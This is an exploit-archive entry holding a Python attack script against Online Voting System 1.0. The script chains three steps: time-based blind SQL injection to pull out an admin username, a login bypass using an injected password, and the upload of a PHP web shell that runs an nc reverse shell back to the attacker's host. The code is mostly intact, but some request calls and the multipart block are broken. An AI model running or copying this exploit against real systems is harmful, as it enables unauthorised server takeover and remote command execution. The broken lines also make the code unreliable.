Online Voting System 1.0 SQL Injection / Remote Code Execution

Online Voting System version 1.0 remote SQL injection to code execution exploit. This is a variant exploit based off of the original discovery by deathflash1411 in July of 2021.

MD5 | 4cc038089808ddff958a056a54dae202

# Exploit Title: Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)
# Exploit Author: Geiseric
# Original Exploit Author: deathflash1411 - -
# Date 02.07.2021
# Vendor Homepage:
# Software Link:
# Version 1.0
# Tested on: Ubuntu 20.04

import requests
import os
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder
import string
import random

if len(sys.argv) < 4:
print('[+] Usage: python3 http://<ip> <your ip> <your port>')

url = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]

exp_url = '/Online_voting_system/admin/save_candidate.php'
login_url = '/Online_voting_system/admin/'

def first_get():

r = requests.get(url+login_url)
return r.headers['Set-Cookie']

def retrieve_first_admin():
print("[!] Stage 1: Finding a valid admin user through SQL Injection")
cookie = first_get()
count = 0
flag = True
admin = ''
while flag:
for j in range(32,128):
r =,data={'UserName': """aasd' AND (SELECT 7303 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(UserName AS NCHAR),0x20) FROM users WHERE User_Type = "admin" LIMIT 0,1),"""+str(i)+""",1))="""+str(j)+""",0,1)))))PwbW)-- qRBs""",'Password': 'asd','Login':''},headers={"Cookie":cookie})
if (r.elapsed.total_seconds() > 1):
admin += chr(j)
sys.stdout.write("\rAdmin User: "+ admin)
if count == 100:
flag = False
count += 1
print("\n[+] First admin user found!")
print("[!] Starting Stage 2")
return admin

def id_generator(size=6, chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))+'.php'

def login_bypass(cookie):
username = retrieve_first_admin()
print("[!] Stage 2 started: Bypassing Login...")
r =,data={'UserName': username,'Password': "' or ''='",'Login':''}, headers={'Cookie':cookie})
return cookie

def rev_write():
name = id_generator()
f = open(name,'w')
f.write('<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ' +attacker_ip+ " " + attacker_port+' >/tmp/f"); ?>')
print('[+] Generated file with reverse shell: ' +name)
return name

def exploit(cookie):
print("[+] Uploading reverse shell...")
multipart_data = MultipartEncoder(

# a file upload field
'image': (filename, open(filename, 'rb'), 'application/x-php'),
# plain text fields
'user_name': 'admin',
'rfirstname': 'test',
'rlastname': 'test',
'rgender': 'Male',
'ryear': '1st year',
'rmname': 'test',
'rposition': 'Governor',
'party': 'test',
'save': 'save'
r =, data=multipart_data, headers={'Content-Type': multipart_data.content_type, 'Cookie':cookie})
return filename

filename = exploit(login_bypass(first_get()))
print("[!] Triggering...")
input('[+] Please start a listener on port ' + attacker_port +' then press Enter to get shell.')
os.system('curl '+url+'/Online_voting_system/admin/upload/'+filename+' -m 1 -s')
print("[+] Cleaning up!")

os.system("rm "+ filename)

Related Posts